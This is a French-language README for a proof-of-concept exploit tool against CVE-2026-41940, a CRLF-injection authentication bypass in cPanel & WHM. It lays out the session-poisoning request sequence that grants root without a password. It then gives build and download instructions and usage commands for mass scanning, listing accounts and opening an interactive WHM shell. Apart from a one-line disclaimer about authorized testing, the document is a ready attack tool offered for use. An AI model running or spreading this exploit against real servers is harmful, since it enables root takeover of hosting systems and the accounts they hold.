
Exploit PoC pour CVE-2026-41940, un contournement d'authentification cPanel & WHM via injection CRLF. Inclut le scan de masse, des actions de post-exploitation et un shell interactif pour les tests autorisés.
Outil par : Ishan Oshada | GitHub
⚠️ UNIQUEMENT POUR DES TESTS DE SÉCURITÉ AUTORISÉS. Toute utilisation non autorisée est illégale.


CVE-2026-41940 est une vulnérabilité d'injection CRLF dans cPanel & WHM (versions < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5).
La fonction saveSession() écrit les données de session après avoir appliqué filter_sessiondata(), mais le filtre est appliqué trop tard. En injectant des caractères CRLF (\r\n) dans l'en-tête Authorization: Basic, un attaquant peut empoisonner le fichier de session sur disque avec des paires clé-valeur arbitraires (par exemple, hasroot=1, tfa_verified=1, user=root).
Lorsque la session empoisonnée est ensuite chargée, cPanel/WHM accorde un accès root complet sans aucun mot de passe.
| Étape | Action | Description |
|---|---|---|
| 1 | POST /login/?login_only=1 | Demander un cookie de session pré-authentification avec de mauvaises identifiants |
| 2 | GET / + en-tête Authorization CRLF | Empoisonner le fichier de session avec hasroot=1, user=root, etc. |
| 3 | GET /scripts2/listaccts | Forcer le cache de session à recharger le fichier empoisonné (propagation) |
| 4 | GET /cpsess<TOKEN>/json-api/version | Vérifier l'accès root – succès = 200 + données de version |
--verbose) – affiche les requêtes/réponses HTTP complètesgit clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC
go build -o cpanel_sniper.exe main.go
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
go run main.go -u https://target.com:2087
Au lieu de compiler à partir des sources, vous pouvez télécharger directement les exécutables stables les plus récents depuis le dépôt. Ils sont générés automatiquement à chaque mise à jour :
| Plateforme | Emplacement |
|---|---|
| Windows (x64) | /bin/windows_x64/cpanel_sniper.exe |
| Linux (x64) | /bin/linux_x64/cpanel_sniper |
| Linux (ARM64) | /bin/linux_arm64/cpanel_sniper |
| macOS (Intel) | /bin/mac_intel/cpanel_sniper |
| macOS (M1/M2/M3) | /bin/mac_m1_m2/cpanel_sniper |
Remarque : Si vous utilisez Linux ou macOS, pensez à accorder les permissions d'exécution après le téléchargement :
# Scan de base
go run main.go -u https://target.com:2087
# Lister tous les comptes cPanel
go run main.go -u https://target.com:2087 -action list
# Shell WHM interactif
go run main.go -u https://target.com:2087 -action shell
# Scan de masse avec urls.txt
go run main.go -l urls.txt -t 20 -o results.json